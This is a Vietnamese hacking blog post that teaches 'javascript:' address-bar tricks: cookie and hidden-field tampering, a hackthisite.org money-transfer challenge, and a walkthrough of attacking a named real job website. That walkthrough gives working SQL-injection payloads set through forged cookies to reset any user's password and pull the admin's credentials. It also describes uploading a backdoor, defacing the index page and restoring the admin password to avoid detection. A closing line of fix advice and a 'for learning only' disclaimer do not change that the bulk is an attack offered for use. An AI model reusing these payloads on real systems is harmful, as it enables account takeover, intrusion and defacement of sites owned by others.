Chia sẻ thông tin

KenjiVN - Quốc Trưởng

Search This Blog

Thứ Ba, 14 tháng 8, 2012

Giỡn chơi một tí: với hack website = javascript


Lâu quá hình như chưa có trương trình hack nèo coi đã mắt nên quyết định chỉ cho anh em mới vô nghề vài mánh để giởn chơi còn kết quả ra sao thì không nói trước có bị quánh thì đừng nói là của tui (vì nguồn st mà) đã thữ rồi kết quã tốt lắm. Nhưng nói trước nghe tuỳ vào IQ cua anh em như thế nào => kết quả như vậy. và mình không chỉ thêm bất cứ vấn đề gì trong chuyên mục này vì bái viết quá rõ, hướng dẫn tĩ mỹ và thật chi tiết và mình cũng đã test thử thấy kết quả là chính xác. Nên trước khi nói là làm không được thì các bạn nên xem lại cho thật kỹ mình đã làm như thế nào
VÔ VẤN ĐỀ
Đầu tiên bạn mở trang web victim lên !
Vào thanh Address chứa link trang web victim xóa sạch link , copy và pase vào đoạn code sau vào


Code:
javascript:document.body.contentEditable='true'; document.designMode='on'; void 0


Và bây giờ bạn có thể làm gì trang web của victim cũng đc , thao tác như notepad
(Và trên đây là minh chứng microsoft bị phá hủy trong nháy mắt)
Hiiiii anh em làm xong đừng nóng

cái này chỉ dành cho mấy mem yếu tim thôi. hi hi



bổ sung thêm cái Hack Web Bằng JavaScript-Inline




[SANITC] : Trong bài viết này mình sẽ giới thiệu với các bạn về kĩ thuật hack web chỉ dùng JavaScript. Với kĩ thuật này, bạn có thể xem xét và hiệu chỉnh giá trị của các cookie hoặc trường ẩn trực tiếp ngay trên trang web. Tất cả chỉ với một trình duyệt web hổ trợ "debug javascript-inline", chẳng hạn như Internet Explorer, Netscape hay Mozilla, ... Cơ bản về JavaScript-Inline^^

Đa số các trình duyệt web đều hổ trợ JavaScript-Inline.
Bạn có thể thi hành JavaScript bằng cách gõ vào thanh URL như sau:
Code:
javascript:void(<đặt lệnh JavaScritpt ngay tại đây!>)
Ví dụ:

Để xem giá trị hiện tại của cookie bạn gõ :
Code:
javascript:alert(document.cookie)
Hoặc
để thay đổi giá trị của trường ẩn "hiddenid" của form đầu tiên thành "2", bạn gõ:
Code:
javascript:void(document.forms[0].hiddenid.value="2")
Mã nguồn HTML có đoạn như sau:
...

Code:
var a=unescape("%43%4f%44%45%5a");
Code:
function check(){if (document.a.c.value == a){document.location.href="http://scifi.pages.at/hackits/"+document.a.c.value+".htm";}else{alert ("wrong! - letter size?");}}}

Đơn giản bạn có thể gõ thẳng vào thanh URL của IE như sau:
Code:
javascript:alert(unescape(a)) để lấy password của level tiếp theo("CODEZ")

Realistic mission 8 trên hackthisite.org yêu cầu bạn chuyển 10 triệu đô từ tài khoản của "Gary Hunter" vào tài khoản "dropCash".
Sau khi bạn dùng SQL-Injection để lấy username của "Gary Hunter", bạn tiến hành chuyển tiền như sau:

Đăng nhập vào tài khoản của bạn. Trên thanh URL của IE bạn gõ vào:
Code:
javascript:void(document.write('< name="the_" ="movemoney.php" method="post"><value="GaryWilliamHunter" name="FROM" ="">< value="dropCash"name="TO" ="">< value="10000000" name="AMOUNT" =""><value="Move Money To A Different Account" ="submit">'))
Đoạn JavaScript trên sẽ tạo một form với trường ẩn

Code:
FROM=GaryWilliamHunter, TO=dropCash, AMOUNT=10000000
Bây giờ bạn thay đổi cookie lại như sau:
Code:
javascript:void(document.cookie="accountUsername=G aryWilliamHunter")javascript:void(document.cookie="accountPassword=G aryWilliamHunter")

Ấn nút "Move Money To A Different Account" một cái là xong.

Mình nghĩ rất có khả năng là mission 8 tạo một session("LoggedIn").
Mỗi lần chúng ta đăng nhập vào nó sẽ đặt session("LoggedIn")=1. Chúng ta chỉ cần thay đổi lại giá trị của cookie và trường ẩn để thực hiện việc chuyển tiền trong session của chúng ta
vì nó chỉ kiểm tra sesion("LoggedIn")=1 mà không kiểm tra username thực sự là ai.

Ví dụ cuối cùng, mình sẽ trình bày về cách hack trang web
http://www.mangvieclam.com/.

Sau khi đã đăng nhập vào mangvieclam.com, bạn gõ vào thanh URL dòng javascript:alert(document.cookie) để xem cookie.

Ban có thể thay đổi thông tin cá nhân của một user bất kì trên mangvieclam.com bằng cách đổi lại cookie username như sau: javascript:void(document.cookie="username=tên user"), sau đó chọn mục "Cập nhập thông tin"

Bạn cũng có thể thay đổi password của một user bất kì trên mangvieclam.com sau khi đã login vào với account của mình như sau: chọn mục "Thay đổi mật khẩu", gõ dòng javascript:void(document.cookie="username=tên user"+escape("' or '1'='1")) vào thanh URL, nhập password cũ là gì cũng được và password mới, sau đó ấn nút "Thay đổi mật khẩu".

Lỗi này nằm trong file icl/filerec/detail.asp, dòng thứ 43..65. Ví dụ, khi bạn set cookie username là "trungkien' or '1'='1", các câu lệnh SQL sau sẽ được thực thi:
Code:
Select Count(UserID) As Check From tblUserInfo Where UserID = 'trungkien' or '1'='1' And Passwords='md5(password cũ sai)' And Active = 1982 // luôn trả về true do điều kiện or '1'='1' đúng mặc dù password cũ sai

Code:
Update tblUserInfo Set Passwords = 'md5(password mới)' Where UserID = 'trungkien' or '1'='1' And Active = 1982 // luôn set password mới cho user "trungkien" do điều kiện UserID = 'trungkien' đúng trước điều kiện '1'='1'
Rất tiếc là lỗi này không thể khai thác trên
LINK :http://www.mangvieclam.com/
do lỗi lập trình.
Code:
Select Count(UserID) As Check From tblUserInfo Where UserID = N'trungkien' or '1'='1' And Passwords = N'...' And Active = 1982
Tuy nhiên, website
LINK :http://www.mangvieclam.com/
dùng CSDL MS-SQL nên mình dễ dàng lấy được username và password của admin từ tblConfig như sau:
Code:
Đầu tiên mình lấy username bằng javascript:void(document.cookie="username="+escape ("' or 1=convert(int,(select adminid from tblconfig where accid=1))--"))
Chọn mục "Cập nhập thông tin"

Tên đăng nhâp của admin là 'ngtuan'

Tương tự mình lấy password của admin bằng

Code:
javascript:void(document.cookie="username="+escape ("' or 1=convert(int,(select adminpass from tblconfig where accid=1))--"))
Bây giờ mình đặt lại password mới là 'hacked'
HTML
Code:
<form action=http://www.mangvieclam.com/log.asp method=post>username: <input type=text name=username><br>password: <input type=password name=password><br><input type=hidden name=ChoseLogin value=3><input type=hidden name=mod value=1><input type=submit value=login></form>
Upload backdoor và thay đổi trang index.asp. Sau đó restore lại pasword cũ cho admin để tránh bị phát hiện:
Code:
javascript:void(document.cookie="username="+escape ("';update tblconfig set adminpass='...' where accid=1--"))
Một giải pháp cho mangvieclam.com là bạn nên chuyển biến Request.Cookies("UserName") thành biến phiên Session("UserName") để tránh bị giả mạo username như ở trên.

<---------THE END----------->
Chúc các bạn thành công. Nên nhớ rằng dùng để học hỏi không nên lấy để đi phá các bạn có thể tạo stile trên free host và áp dụng xem sao

1 nhận xét:

  1. có thể chỉ mình hack 1 website để tìm pass và username cụ thể hơn tý kg? mail: mayhappy45@gmail.com

    Trả lờiXóa